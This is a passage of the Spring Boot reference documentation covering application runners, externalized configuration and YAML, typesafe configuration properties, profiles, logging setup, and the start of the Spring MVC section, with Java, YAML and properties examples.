org.springframework.beans.factory.annotation.*\n\timport org.springframework.stereotype.*\n\n\t@Component\n\tpublic class MyBean {\n\n\t\t@Autowired\n\t\tpublic MyBean(ApplicationArguments args) {\n\t\t\tboolean debug = args.containsOption(\"debug\");\n\t\t\tList<String> files = args.getNonOptionArgs();\n\t\t\t\/\/ if run with \"--debug logfile.txt\" debug=true, files=[\"logfile.txt\"]\n\t\t}\n\n\t}\n----\n\nTIP: Spring Boot will also register a `CommandLinePropertySource` with the Spring\n`Environment`. This allows you to also inject single application arguments using the\n`@Value` annotation.\n\n\n\n[[boot-features-command-line-runner]]\n=== Using the ApplicationRunner or CommandLineRunner\nIf you need to run some specific code once the `SpringApplication` has started, you can\nimplement the `ApplicationRunner` or `CommandLineRunner` interfaces. Both interfaces work\nin the same way and offer a single `run` method which will be called just before\n`SpringApplication.run(...)` completes.\n\nThe `CommandLineRunner` interfaces provides access to application arguments as a simple\nstring array, whereas the `ApplicationRunner` uses the `ApplicationArguments` interface\ndiscussed above.\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.*\n\timport org.springframework.stereotype.*\n\n\t@Component\n\tpublic class MyBean implements CommandLineRunner {\n\n\t\tpublic void run(String... args) {\n\t\t\t\/\/ Do something...\n\t\t}\n\n\t}\n----\n\nYou can additionally implement the `org.springframework.core.Ordered` interface or use the\n`org.springframework.core.annotation.Order` annotation if several `CommandLineRunner` or\n`ApplicationRunner` beans are defined that must be called in a specific order.\n\n\n\n[[boot-features-application-exit]]\n=== Application exit\nEach `SpringApplication` will register a shutdown hook with the JVM to ensure that the\n`ApplicationContext` is closed gracefully on exit. All the standard Spring lifecycle\ncallbacks (such as the `DisposableBean` interface, or the `@PreDestroy` annotation) can\nbe used.\n\nIn addition, beans may implement the `org.springframework.boot.ExitCodeGenerator`\ninterface if they wish to return a specific exit code when the application ends.\n\n\n\n[[boot-features-application-admin]]\n=== Admin features\nIt is possible to enable admin-related features for the application by specifying the\n`spring.application.admin.enabled` property. This exposes the\n{sc-spring-boot}\/admin\/SpringApplicationAdminMXBean.{sc-ext}[`SpringApplicationAdminMXBean`]\non the platform `MBeanServer`. You could use this feature to administer your Spring Boot\napplication remotely. This could also be useful for any service wrapper implementation.\n\nTIP: If you want to know on which HTTP port the application is running, get the property\nwith key `local.server.port`.\n\nNOTE: Take care when enabling this feature as the MBean exposes a method to shutdown the\napplication.\n\n\n\n[[boot-features-external-config]]\n== Externalized Configuration\nSpring Boot allows you to externalize your configuration so you can work with the same\napplication code in different environments. You can use properties files, YAML files,\nenvironment variables and command-line arguments to externalize configuration. Property\nvalues can be injected directly into your beans using the `@Value` annotation, accessed\nvia Spring's `Environment` abstraction or\n<<boot-features-external-config-typesafe-configuration-properties,bound to structured objects>>\nvia `@ConfigurationProperties`.\n\nSpring Boot uses a very particular `PropertySource` order that is designed to allow\nsensible overriding of values, properties are considered in the following order:\n\n. Command line arguments.\n. JNDI attributes from `java:comp\/env`.\n. Java System properties (`System.getProperties()`).\n. OS environment variables.\n. A `RandomValuePropertySource` that only has properties in `+random.*+`.\n. <<boot-features-external-config-profile-specific-properties,Profile-specific\n application properties>> outside of your packaged jar\n (`application-{profile}.properties` and YAML variants)\n. <<boot-features-external-config-profile-specific-properties,Profile-specific\n application properties>> packaged inside your jar (`application-{profile}.properties`\n and YAML variants)\n. Application properties outside of your packaged jar (`application.properties` and YAML\n variants).\n. Application properties packaged inside your jar (`application.properties` and YAML\n variants).\n. {spring-javadoc}\/context\/annotation\/PropertySource.{dc-ext}[`@PropertySource`] annotations\n on your `@Configuration` classes.\n. Default properties (specified using `SpringApplication.setDefaultProperties`).\n\nTo provide a concrete example, suppose you develop a `@Component` that uses a\n`name` property:\n\n[source,java,indent=0]\n----\n\timport org.springframework.stereotype.*\n\timport org.springframework.beans.factory.annotation.*\n\n\t@Component\n\tpublic class MyBean {\n\n\t @Value(\"${name}\")\n\t private String name;\n\n\t \/\/ ...\n\n\t}\n----\n\nYou can bundle an `application.properties` inside your jar that provides a sensible\ndefault `name`. When running in production, an `application.properties` can be provided\noutside of your jar that overrides `name`; and for one-off testing, you can launch with\na specific command line switch (e.g. `java -jar app.jar --name=\"Spring\"`).\n\n\n\n[[boot-features-external-config-random-values]]\n=== Configuring random values\nThe `RandomValuePropertySource` is useful for injecting random values (e.g. into secrets\nor test cases). It can produce integers, longs or strings, e.g.\n\n[source,properties,indent=0]\n----\n\tmy.secret=${random.value}\n\tmy.number=${random.int}\n\tmy.bignumber=${random.long}\n\tmy.number.less.than.ten=${random.int(10)}\n\tmy.number.in.range=${random.int[1024,65536]}\n----\n\nThe `+random.int*+` syntax is `OPEN value (,max) CLOSE` where the `OPEN,CLOSE` are any\ncharacter and `value,max` are integers. If `max` is provided then `value` is the minimum\nvalue and `max` is the maximum (exclusive).\n\n\n\n[[boot-features-external-config-command-line-args]]\n=== Accessing command line properties\nBy default `SpringApplication` will convert any command line option arguments (starting\nwith '`--`', e.g. `--server.port=9000`) to a `property` and add it to the Spring\n`Environment`. As mentioned above, command line properties always take precedence over\nother property sources.\n\nIf you don't want command line properties to be added to the `Environment` you can disable\nthem using `SpringApplication.setAddCommandLineProperties(false)`.\n\n\n\n[[boot-features-external-config-application-property-files]]\n=== Application property files\n`SpringApplication` will load properties from `application.properties` files in the\nfollowing locations and add them to the Spring `Environment`:\n\n. A `\/config` subdir of the current directory.\n. The current directory\n. A classpath `\/config` package\n. The classpath root\n\nThe list is ordered by precedence (properties defined in locations higher in the list\noverride those defined in lower locations).\n\nNOTE: You can also <<boot-features-external-config-yaml, use YAML ('.yml') files>> as\nan alternative to '.properties'.\n\nIf you don't like `application.properties` as the configuration file name you can switch\nto another by specifying a `spring.config.name` environment property. You can also refer\nto an explicit location using the `spring.config.location` environment property\n(comma-separated list of directory locations, or file paths).\n\n[indent=0]\n----\n\t$ java -jar myproject.jar --spring.config.name=myproject\n----\n\nor\n\n[indent=0]\n----\n\t$ java -jar myproject.jar --spring.config.location=classpath:\/default.properties,classpath:\/override.properties\n----\n\nIf `spring.config.location` contains directories (as opposed to files) they should end\nin `\/` (and will be appended with the names generated from `spring.config.name` before\nbeing loaded). The default search path `classpath:,classpath:\/config,file:,file:config\/`\nis always used, irrespective of the value of `spring.config.location`. In that way you\ncan set up default values for your application in `application.properties` (or whatever\nother basename you choose with `spring.config.name`) and override it at runtime with a\ndifferent file, keeping the defaults.\n\nNOTE: If you use environment variables rather than system properties, most operating\nsystems disallow period-separated key names, but you can use underscores instead (e.g.\n`SPRING_CONFIG_NAME` instead of `spring.config.name`).\n\nNOTE: If you are running in a container then JNDI properties (in `java:comp\/env`) or\nservlet context initialization parameters can be used instead of, or as well as,\nenvironment variables or system properties.\n\n\n\n[[boot-features-external-config-profile-specific-properties]]\n=== Profile-specific properties\nIn addition to `application.properties` files, profile-specific properties can also be\ndefined using the naming convention `application-{profile}.properties`. The\n`Environment` has a set of default profiles (by default `[default]`) which are\nused if no active profiles are set (i.e. if no profiles are explicitly activated\nthen properties from `application-default.properties` are loaded).\n\nProfile specific properties are loaded from the same locations as standard\n`application.properties`, with profile-specific files always overriding the non-specific\nones irrespective of whether the profile-specific files are inside or outside your\npackaged jar.\n\n\n\n[[boot-features-external-config-placeholders-in-properties]]\n=== Placeholders in properties\nThe values in `application.properties` are filtered through the existing `Environment`\nwhen they are used so you can refer back to previously defined values (e.g. from System\nproperties).\n\n[source,properties,indent=0]\n----\n\tapp.name=MyApp\n\tapp.description=${app.name} is a Spring Boot application\n----\n\nTIP: You can also use this technique to create '`short`' variants of existing Spring Boot\nproperties. See the _<<howto.adoc#howto-use-short-command-line-arguments>>_ how-to\nfor details.\n\n\n\n[[boot-features-external-config-yaml]]\n=== Using YAML instead of Properties\nhttp:\/\/yaml.org[YAML] is a superset of JSON, and as such is a very convenient format\nfor specifying hierarchical configuration data. The `SpringApplication` class will\nautomatically support YAML as an alternative to properties whenever you have the\nhttp:\/\/www.snakeyaml.org\/[SnakeYAML] library on your classpath.\n\nNOTE: If you use '`starter POMs`' SnakeYAML will be automatically provided via\n`spring-boot-starter`.\n\n\n\n[[boot-features-external-config-loading-yaml]]\n==== Loading YAML\nSpring Framework provides two convenient classes that can be used to load YAML documents.\nThe `YamlPropertiesFactoryBean` will load YAML as `Properties` and the\n`YamlMapFactoryBean` will load YAML as a `Map`.\n\nFor example, the following YAML document:\n\n[source,yaml,indent=0]\n----\n\tenvironments:\n\t\tdev:\n\t\t\turl: http:\/\/dev.bar.com\n\t\t\tname: Developer Setup\n\t\tprod:\n\t\t\turl: http:\/\/foo.bar.com\n\t\t\tname: My Cool App\n----\n\nWould be transformed into these properties:\n\n[source,properties,indent=0]\n----\n\tenvironments.dev.url=http:\/\/dev.bar.com\n\tenvironments.dev.name=Developer Setup\n\tenvironments.prod.url=http:\/\/foo.bar.com\n\tenvironments.prod.name=My Cool App\n----\n\nYAML lists are represented as property keys with `[index]` dereferencers,\nfor example this YAML:\n\n[source,yaml,indent=0]\n----\n\t my:\n\t\tservers:\n\t\t\t- dev.bar.com\n\t\t\t- foo.bar.com\n----\n\nWould be transformed into these properties:\n\n[source,properties,indent=0]\n----\n\tmy.servers[0]=dev.bar.com\n\tmy.servers[1]=foo.bar.com\n----\n\nTo bind to properties like that using the Spring `DataBinder` utilities (which is what\n`@ConfigurationProperties` does) you need to have a property in the target bean of type\n`java.util.List` (or `Set`) and you either need to provide a setter, or initialize it\nwith a mutable value, e.g. this will bind to the properties above\n\n[source,java,indent=0]\n----\n\t@ConfigurationProperties(prefix=\"my\")\n\tpublic class Config {\n\n\t\tprivate List<String> servers = new ArrayList<String>();\n\n\t\tpublic List<String> getServers() {\n\t\t\treturn this.servers;\n\t\t}\n\t}\n----\n\n\n\n[[boot-features-external-config-exposing-yaml-to-spring]]\n==== Exposing YAML as properties in the Spring Environment\nThe `YamlPropertySourceLoader` class can be used to expose YAML as a `PropertySource`\nin the Spring `Environment`. This allows you to use the familiar `@Value` annotation with\nplaceholders syntax to access YAML properties.\n\n\n\n[[boot-features-external-config-multi-profile-yaml]]\n==== Multi-profile YAML documents\nYou can specify multiple profile-specific YAML documents in a single file by\nusing a `spring.profiles` key to indicate when the document applies. For example:\n\n[source,yaml,indent=0]\n----\n\tserver:\n\t\taddress: 192.168.1.100\n\t---\n\tspring:\n\t\tprofiles: development\n\tserver:\n\t\taddress: 127.0.0.1\n\t---\n\tspring:\n\t\tprofiles: production\n\tserver:\n\t\taddress: 192.168.1.120\n----\n\nIn the example above, the `server.address` property will be `127.0.0.1` if the\n`development` profile is active. If the `development` and `production` profiles are *not*\nenabled, then the value for the property will be `192.168.1.100`.\n\nThe default profiles are activated if none are explicitly active when the application\ncontext starts. So in this YAML we set a value for `security.user.password` that is\n*only* available in the \"default\" profile:\n\n[source,yaml,indent=0]\n----\n\tserver:\n\t port: 80000\n\t---\n\tspring:\n\t profiles: default\n\tsecurity:\n\t user:\n\t password: weak\n----\n\nwhereas in this example, the password is always set because it isn't attached to any\nprofile, and it would have to be explicitly reset in all other profiles as necessary:\n\n[source,yaml,indent=0]\n----\n\tserver:\n\t port: 80000\n\tsecurity:\n\t user:\n\t password: weak\n----\n\n\n\n[[boot-features-external-config-yaml-shortcomings]]\n==== YAML shortcomings\nYAML files can't be loaded via the `@PropertySource` annotation. So in the\ncase that you need to load values that way, you need to use a properties file.\n\n\n\n[[boot-features-external-config-typesafe-configuration-properties]]\n=== Typesafe Configuration Properties\nUsing the `@Value(\"${property}\")` annotation to inject configuration properties can\nsometimes be cumbersome, especially if you are working with multiple properties or\nyour data is hierarchical in nature. Spring Boot provides an alternative method\nof working with properties that allows strongly typed beans to govern and validate\nthe configuration of your application. For example:\n\n[source,java,indent=0]\n----\n\t@Component\n\t@ConfigurationProperties(prefix=\"connection\")\n\tpublic class ConnectionSettings {\n\n\t\tprivate String username;\n\n\t\tprivate InetAddress remoteAddress;\n\n\t\t\/\/ ... getters and setters\n\n\t}\n----\n\nNOTE: The getters and setters are advisable, since binding is via standard Java Beans\nproperty descriptors, just like in Spring MVC. They are mandatory for immutable types or\nthose that are directly coercible from `String`. As long as they are initialized, maps,\ncollections, and arrays need a getter but not necessarily a setter since they can be\nmutated by the binder. If there is a setter, Maps, collections, and arrays can be created.\nMaps and collections can be expanded with only a getter, whereas arrays require a setter.\nNested POJO properties can also be created (so a setter is not mandatory) if they have a\ndefault constructor, or a constructor accepting a single value that can be coerced from\nString. Some people use Project Lombok to add getters and setters automatically.\n\nThe `@EnableConfigurationProperties` annotation is automatically applied to your project\nso that any beans annotated with `@ConfigurationProperties` will be configured from the\n`Environment` properties. This style of configuration works particularly well with the\n`SpringApplication` external YAML configuration:\n\n[source,yaml,indent=0]\n----\n\t# application.yml\n\n\tconnection:\n\t\tusername: admin\n\t\tremoteAddress: 192.168.1.1\n\n\t# additional configuration as required\n----\n\nTo work with `@ConfigurationProperties` beans you can just inject them in the same way\nas any other bean.\n\n[source,java,indent=0]\n----\n\t@Service\n\tpublic class MyService {\n\n\t\t@Autowired\n\t\tprivate ConnectionSettings connection;\n\n\t \t\/\/...\n\n\t\t@PostConstruct\n\t\tpublic void openConnection() {\n\t\t\tServer server = new Server();\n\t\t\tthis.connection.configure(server);\n\t\t}\n\n\t}\n----\n\nIt is also possible to shortcut the registration of `@ConfigurationProperties` bean\ndefinitions by simply listing the properties classes directly in the\n`@EnableConfigurationProperties` annotation:\n\n[source,java,indent=0]\n----\n\t@Configuration\n\t@EnableConfigurationProperties(ConnectionSettings.class)\n\tpublic class MyConfiguration {\n\t}\n----\n\nTIP: Using `@ConfigurationProperties` also allows you to generate meta-data files that can\nbe used by IDEs. See the <<configuration-metadata>> appendix for details.\n\n\n\n[[boot-features-external-config-3rd-party-configuration]]\n==== Third-party configuration\nAs well as using `@ConfigurationProperties` to annotate a class, you can also use it\non `@Bean` methods. This can be particularly useful when you want to bind properties to\nthird-party components that are outside of your control.\n\nTo configure a bean from the `Environment` properties, add `@ConfigurationProperties` to\nits bean registration:\n\n[source,java,indent=0]\n----\n\t@ConfigurationProperties(prefix = \"foo\")\n\t@Bean\n\tpublic FooComponent fooComponent() {\n\t\t...\n\t}\n----\n\nAny property defined with the `foo` prefix will be mapped onto that `FooComponent` bean\nin a similar manner as the `ConnectionSettings` example above.\n\n\n\n[[boot-features-external-config-relaxed-binding]]\n==== Relaxed binding\nSpring Boot uses some relaxed rules for binding `Environment` properties to\n`@ConfigurationProperties` beans, so there doesn't need to be an exact match between\nthe `Environment` property name and the bean property name. Common examples where this\nis useful include dashed separated (e.g. `context-path` binds to `contextPath`), and\ncapitalized (e.g. `PORT` binds to `port`) environment properties.\n\nFor example, given the following `@ConfigurationProperties` class:\n\n[source,java,indent=0]\n----\n\t@Component\n\t@ConfigurationProperties(prefix=\"person\")\n\tpublic class ConnectionSettings {\n\n\t\tprivate String firstName;\n\n\t\tpublic String getFirstName() {\n\t\t\treturn this.firstName;\n\t\t}\n\n\t\tpublic void setFirstName(String firstName) {\n\t\t\tthis.firstName = firstName;\n\t\t}\n\n\t}\n----\n\nThe following properties names can all be used:\n\n.relaxed binding\n[cols=\"1,4\"]\n|===\n| Property | Note\n\n|`person.firstName`\n|Standard camel case syntax.\n\n|`person.first-name`\n|Dashed notation, recommended for use in `.properties` and `.yml` files.\n\n|`PERSON_FIRST_NAME`\n|Upper case format. Recommended when using a system environment variables.\n|===\n\nSpring will attempt to coerce the external application properties to the right type when\nit binds to the `@ConfigurationProperties` beans. If you need custom type conversion you\ncan provide a `ConversionService` bean (with bean id `conversionService`) or custom\nproperty editors (via a `CustomEditorConfigurer` bean) or custom `Converters` (with\nbean definitions annotated as `@ConfigurationPropertiesBinding`).\n\nNOTE: As this bean is requested very early during the application lifecycle, make sure to\nlimit the dependencies your `ConversionService` is using. Typically, any dependency that\nyou'd require may not be fully initialized at creation time. You may want to rename your\ncustom `ConversionService` if it's not required for configuration keys coercion.\n\n\n[[boot-features-external-config-validation]]\n==== @ConfigurationProperties Validation\nSpring Boot will attempt to validate external configuration, by default using JSR-303\n(if it is on the classpath). You can simply add JSR-303 `javax.validation` constraint\nannotations to your `@ConfigurationProperties` class:\n\n[source,java,indent=0]\n----\n\t@Component\n\t@ConfigurationProperties(prefix=\"connection\")\n\tpublic class ConnectionSettings {\n\n\t\t@NotNull\n\t\tprivate InetAddress remoteAddress;\n\n\t\t\/\/ ... getters and setters\n\n\t}\n----\n\nIn order to validate values of nested properties, you must annotate the associated field\nas `@Valid` to trigger its validation. For example, building upon the above\n`ConnectionSettings` example:\n\n[source,java,indent=0]\n----\n\t@Component\n\t@ConfigurationProperties(prefix=\"connection\")\n\tpublic class ConnectionSettings {\n\n\t\t@NotNull\n\t\t@Valid\n\t\tprivate RemoteAddress remoteAddress;\n\n\t\t\/\/ ... getters and setters\n\n\t\tprivate static class RemoteAddress {\n\n\t\t\t@NotEmpty\n\t\t\tpublic String hostname;\n\n\t\t\t\/\/ ... getters and setters\n\n\t\t}\n\n\t}\n----\n\nYou can also add a custom Spring `Validator` by creating a bean definition called\n`configurationPropertiesValidator`. There is a\n{github-code}\/spring-boot-samples\/spring-boot-sample-property-validation[Validation sample]\nso you can see how to set things up.\n\nTIP: The `spring-boot-actuator` module includes an endpoint that exposes all\n`@ConfigurationProperties` beans. Simply point your web browser to `\/configprops`\nor use the equivalent JMX endpoint. See the\n_<<production-ready-features.adoc#production-ready-endpoints, Production ready features>>_.\nsection for details.\n\n\n[[boot-features-profiles]]\n== Profiles\nSpring Profiles provide a way to segregate parts of your application configuration and\nmake it only available in certain environments. Any `@Component` or `@Configuration` can\nbe marked with `@Profile` to limit when it is loaded:\n\n[source,java,indent=0]\n----\n\t@Configuration\n\t@Profile(\"production\")\n\tpublic class ProductionConfiguration {\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIn the normal Spring way, you can use a `spring.profiles.active`\n`Environment` property to specify which profiles are active. You can\nspecify the property in any of the usual ways, for example you could\ninclude it in your `application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.profiles.active=dev,hsqldb\n----\n\nor specify on the command line using the switch `--spring.profiles.active=dev,hsqldb`.\n\n\n\n[[boot-features-adding-active-profiles]]\n=== Adding active profiles\nThe `spring.profiles.active` property follows the same ordering rules as other\nproperties, the highest `PropertySource` will win. This means that you can specify\nactive profiles in `application.properties` then *replace* them using the command line\nswitch.\n\nSometimes it is useful to have profile specific properties that *add* to the active\nprofiles rather than replace them. The `spring.profiles.include` property can be used\nto unconditionally add active profiles. The `SpringApplication` entry point also has\na Java API for setting additional profiles (i.e. on top of those activated by the\n`spring.profiles.active` property): see the `setAdditionalProfiles()` method.\n\nFor example, when an application with following properties is run using the switch\n`--spring.profiles.active=prod` the `proddb` and `prodmq` profiles will also be activated:\n\n[source,yaml,indent=0]\n----\n\t---\n\tmy.property: fromyamlfile\n\t---\n\tspring.profiles: prod\n\tspring.profiles.include: proddb,prodmq\n----\n\nNOTE: Remember that the `spring.profiles` property can be defined in a YAML document\nto determine when this particular document is included in the configuration. See\n<<howto-change-configuration-depending-on-the-environment>> for more details.\n\n\n\n[[boot-features-programmatically-setting-profiles]]\n=== Programmatically setting profiles\nYou can programmatically set active profiles by calling\n`SpringApplication.setAdditionalProfiles(...)` before your application runs. It is also\npossible to activate profiles using Spring's `ConfigurableEnvironment` interface.\n\n\n\n[[boot-features-profile-specific-configuration]]\n=== Profile specific configuration files\nProfile specific variants of both `application.properties` (or `application.yml`) and\nfiles referenced via `@ConfigurationProperties` are considered as files are loaded.\nSee _<<boot-features-external-config-profile-specific-properties>>_ for details.\n\n\n\n[[boot-features-logging]]\n== Logging\nSpring Boot uses http:\/\/commons.apache.org\/logging[Commons Logging] for all internal\nlogging, but leaves the underlying log implementation open. Default configurations are\nprovided for\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/logging\/package-summary.html[Java Util Logging],\nhttp:\/\/logging.apache.org\/log4j\/[Log4J], http:\/\/logging.apache.org\/log4j\/2.x\/[Log4J2] and\nhttp:\/\/logback.qos.ch\/[Logback]. In each case loggers are pre-configured to use console\noutput with optional file output also available.\n\nBy default, If you use the '`Starter POMs`', Logback will be used for logging. Appropriate\nLogback routing is also included to ensure that dependent libraries that use\nJava Util Logging, Commons Logging, Log4J or SLF4J will all work correctly.\n\nTIP: There are a lot of logging frameworks available for Java. Don't worry if the above\nlist seems confusing. Generally you won't need to change your logging dependencies and\nthe Spring Boot defaults will work just fine.\n\n\n\n[[boot-features-logging-format]]\n=== Log format\nThe default log output from Spring Boot looks like this:\n\n[indent=0]\n----\n2014-03-05 10:57:51.112 INFO 45469 --- [ main] org.apache.catalina.core.StandardEngine : Starting Servlet Engine: Apache Tomcat\/7.0.52\n2014-03-05 10:57:51.253 INFO 45469 --- [ost-startStop-1] o.a.c.c.C.[Tomcat].[localhost].[\/] : Initializing Spring embedded WebApplicationContext\n2014-03-05 10:57:51.253 INFO 45469 --- [ost-startStop-1] o.s.web.context.ContextLoader : Root WebApplicationContext: initialization completed in 1358 ms\n2014-03-05 10:57:51.698 INFO 45469 --- [ost-startStop-1] o.s.b.c.e.ServletRegistrationBean : Mapping servlet: 'dispatcherServlet' to [\/]\n2014-03-05 10:57:51.702 INFO 45469 --- [ost-startStop-1] o.s.b.c.embedded.FilterRegistrationBean : Mapping filter: 'hiddenHttpMethodFilter' to: [\/*]\n----\n\nThe following items are output:\n\n* Date and Time -- Millisecond precision and easily sortable.\n* Log Level -- `ERROR`, `WARN`, `INFO`, `DEBUG` or `TRACE`.\n* Process ID.\n* A `---` separator to distinguish the start of actual log messages.\n* Thread name -- Enclosed in square brackets (may be truncated for console output).\n* Logger name -- This is usually the source class name (often abbreviated).\n* The log message.\n\nNOTE: Logback does not have a `FATAL` level (it is mapped to `ERROR`)\n\n\n[[boot-features-logging-console-output]]\n=== Console output\nThe default log configuration will echo messages to the console as they are written. By\ndefault `ERROR`, `WARN` and `INFO` level messages are logged. To also log `DEBUG` level\nmessages to the console you can start your application with a `--debug` flag.\n\n[indent=0]\n----\n\t$ java -jar myapp.jar --debug\n----\n\nNOTE: you can also specify `debug=true` in your `application.properties`.\n\nIf your terminal supports ANSI, color output will be used to aid readability. You can set\n`spring.output.ansi.enabled` to a\n{dc-spring-boot}\/ansi\/AnsiOutput.Enabled.{dc-ext}[supported value] to override the auto\ndetection.\n\n\n\n[[boot-features-logging-file-output]]\n=== File output\nBy default, Spring Boot will only log to the console and will not write log files. If you\nwant to write log files in addition to the console output you need to set a\n`logging.file` or `logging.path` property (for example in your `application.properties`).\n\nThe following table shows how the `logging.*` properties can be used together:\n\n.Logging properties\n[cols=\"1,1,1,4\"]\n|===\n|`logging.file` |`logging.path` |Example |Description\n|_(none)_\n|_(none)_\n|\n|Console only logging.\n\n|Specific file\n|_(none)_\n|`my.log`\n|Writes to the specified log file. Names can be an exact location or relative to the\ncurrent directory.\n\n|_(none)_\n|Specific directory\n|`\/var\/log`\n|Writes `spring.log` to the specified directory. Names can be an exact location or\nrelative to the current directory.\n|===\n\nLog files will rotate when they reach 10 Mb and as with console output, `ERROR`, `WARN`\nand `INFO` level messages are logged by default.\n\nNOTE: The logging system is initialized early in the application lifecycle and as such\nlogging properties will not be found in property files loaded via `@PropertySource`\nannotations.\n\n\n\n[[boot-features-custom-log-levels]]\n=== Log Levels\nAll the supported logging systems can have the logger levels set in the Spring\n`Environment` (so for example in `application.properties`) using\n'`+logging.level.*=LEVEL+`' where '`LEVEL`' is one of TRACE, DEBUG, INFO, WARN, ERROR,\nFATAL, OFF. Example `application.properties`:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tlogging.level.org.springframework.web=DEBUG\n\tlogging.level.org.hibernate=ERROR\n----\n\nNOTE: By default Spring Boot remaps Thymeleaf `INFO` messages so that they are logged at\n`DEBUG` level. This helps to reduce noise in the standard log output. See\n{sc-spring-boot}\/logging\/logback\/LevelRemappingAppender.{sc-ext}[`LevelRemappingAppender`]\nfor details of how you can apply remapping in your own configuration.\n\n\n\n[[boot-features-custom-log-configuration]]\n=== Custom log configuration\nThe various logging systems can be activated by including the appropriate libraries on\nthe classpath, and further customized by providing a suitable configuration file in the\nroot of the classpath, or in a location specified by the Spring `Environment` property\n`logging.config`.\n\nNOTE: Since logging is initialized *before* the `ApplicationContext` is created, it isn't\npossible to control logging from `@PropertySources` in Spring `@Configuration` files.\nSystem properties and the conventional Spring Boot external configuration files work just\nfine.)\n\nDepending on your logging system, the following files will be loaded:\n\n|===\n|Logging System |Customization\n\n|Logback\n|`logback-spring.xml`, `logback-spring.groovy`, `logback.xml` or `logback.groovy`\n\n|Log4j\n|`log4j-spring.properties`, `log4j-spring.xml`, `log4j.properties` or `log4j.xml`\n\n|Log4j2\n|`log4j2-spring.xml` or `log4j2.xml`\n\n|JDK (Java Util Logging)\n|`logging.properties`\n|===\n\nNOTE: When possible we recommend that you use the `-spring` variants for your logging\nconfiguration (for example `logback-spring.xml` rather than `logback.xml`). If you use\nstandard configuration locations, Spring cannot completely control log initialization.\n\nWARNING: There are known classloading issues with Java Util Logging that cause problems\nwhen running from an '`executable jar`'. We recommend that you avoid it if at all\npossible.\n\nTo help with the customization some other properties are transferred from the Spring\n`Environment` to System properties:\n\n|===\n|Spring Environment |System Property |Comments\n\n|`logging.exception-conversion-word`\n|`LOG_EXCEPTION_CONVERSION_WORD`\n|The conversion word that's used when logging exceptions.\n\n|`logging.file`\n|`LOG_FILE`\n|Used in default log configuration if defined.\n\n|`logging.path`\n|`LOG_PATH`\n|Used in default log configuration if defined.\n\n|`logging.pattern.console`\n|`CONSOLE_LOG_PATTERN`\n|The log pattern to use on the console (stdout). (Not supported with JDK logger.)\n\n|`logging.pattern.file`\n|`FILE_LOG_PATTERN`\n|The log pattern to use in a file (if LOG_FILE enabled). (Not supported with JDK logger.)\n\n|`logging.pattern.level`\n|`LOG_LEVEL_PATTERN`\n|The format to use to render the log level (default `%5p`). (The `logging.pattern.level` form is only supported by Logback.)\n\n|`PID`\n|`PID`\n|The current process ID (discovered if possible and when not already defined as an OS\n environment variable).\n|===\n\n\nAll the logging systems supported can consult System properties when parsing their\nconfiguration files. See the default configurations in `spring-boot.jar` for examples.\n\n[TIP]\n====\n\nYou can add MDC and other ad-hoc content to log lines by overriding\nonly the `LOG_LEVEL_PATTERN` (or `logging.pattern.level` with\nLogback). For example, if you use `logging.pattern.level=user:%X{user}\n%5p` then the default log format will contain an MDC entry for \"user\"\nif it exists, e.g.\n\n----\n2015-09-30 12:30:04.031 user:juergen INFO 22174 --- [ nio-8080-exec-0] demo.Controller Handling authenticated request\n----\n====\n\n\n\n[[boot-features-logback-extensions]]\n=== Logback extensions\nSpring Boot includes a number of extensions to Logback which can help with advanced\nconfiguration. You can use these extensions in your `logback-spring.xml` configuration\nfile.\n\nNOTE: You cannot use extensions in the standard `logback.xml` configuration file since\nit's loaded too early. You need to either use `logback-spring.xml` or define a\n`logging.config` property.\n\n\n\n==== Profile specific configuration\nThe `<springProfile>` tag allows you to optionally include or exclude sections of\nconfiguration based on the active Spring profiles. Profile sections are supported anywhere\nwithin the `<configuration>` element. Use the `name` attribute to specify which profile\naccepts the configuration. Multiple profiles can be specified using a comma-separated\nlist.\n\n[source,xml,indent=0]\n----\n\t<springProfile name=\"staging\">\n\t\t<!-- configuration to be enabled when the \"staging\" profile is active -->\n\t<\/springProfile>\n\n\t<springProfile name=\"dev, staging\">\n\t\t<!-- configuration to be enabled when the \"dev\" or \"staging\" profiles are active -->\n\t<\/springProfile>\n\n\t<springProfile name=\"!production\">\n\t\t<!-- configuration to be enabled when the \"production\" profile is not active -->\n\t<\/springProfile>\n----\n\n\n\n==== Environment properties\nThe `<springProperty>` tag allows you to surface properties from the Spring `Environment`\nfor use within Logback. This can be useful if you want to access values from your\n`application.properties` file in your logback configuration. The tag works in a similar\nway to Logback's standard `<property>` tag, but rather than specifying a direct `value`\nyou specify the `source` of the property (from the `Environment`). You can use the `scope`\nattribute if you need to store the property somewhere other than in `local` scope.\n\n[source,xml,indent=0]\n----\n\t<springProperty scope=\"context\" name=\"fluentHost\" source=\"myapp.fulentd.host\"\/>\n\t<appender name=\"FLUENT\" class=\"ch.qos.logback.more.appenders.DataFluentAppender\">\n\t\t<remoteHost>${fluentHost}<\/remoteHost>\n\t\t...\n\t<\/appender>\n----\n\nTIP: The `RelaxedPropertyResolver` is used to access `Environment` properties. If specify\nthe `source` in dashed notation (`my-property-name`) all the relaxed variations will be\ntried (`myPropertyName`, `MY_PROPERTY_NAME` etc).\n\n\n\n[[boot-features-developing-web-applications]]\n== Developing web applications\nSpring Boot is well suited for web application development. You can easily create a\nself-contained HTTP server using embedded Tomcat, Jetty, or Undertow. Most web\napplications will use the `spring-boot-starter-web` module to get up and running quickly.\n\nIf you haven't yet developed a Spring Boot web application you can follow the\n\"Hello World!\" example in the\n_<<getting-started.adoc#getting-started-first-application, Getting started>>_ section.\n\n\n\n[[boot-features-spring-mvc]]\n=== The '`Spring Web MVC framework`'\nThe Spring Web MVC framework (often referred to as simply '`Spring MVC`') is a rich\n'`model view controller`' web framework. Spring MVC lets you create special `@Controller`\nor `@RestController` beans to handle incoming HTTP requests. Methods in your controller\nare mapped to HTTP using `@RequestMapping` annotations.\n\nHere is a typical example `@RestController` to serve JSON data:\n\n[source,java,indent=0]\n----\n\t@RestController\n\t@RequestMapping(value=\"\/users\")\n\tpublic class MyRestController {\n\n\t\t@RequestMapping(value=\"\/{user}\", method=RequestMethod.GET)\n\t\tpublic User getUser(@PathVariable Long user) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t\t@RequestMapping(value=\"\/{user}\/customers\", method=RequestMethod.GET)\n\t\tList<Customer> getUserCustomers(@PathVariable Long user) 